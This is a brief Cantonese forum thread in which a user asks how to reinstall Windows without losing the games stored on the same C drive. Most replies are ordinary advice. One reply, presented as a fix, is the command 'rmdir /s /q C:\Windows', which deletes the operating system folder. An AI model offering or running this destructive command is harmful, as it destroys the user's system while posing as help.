重裝windows問題

果時自己裝windows裝左落C drive到 (2TB)
但係發覺我d game呀果d所以野都係放落C drive到
搞到而家開機好撚慢 有咩方法可以del左c drive個windows而又唔會令我d game唔見哂
Sorry for 1999

有冇切開佢

有切開 100gb d drive果時on99冇裝到落去

就算真係可以重裝到WINDOWS而唔DELETE你D GAME, 你D GAME咪又係要重裝一次先開到

無

入cmd輸入：
rmdir /s /q C:\Windows

買ssd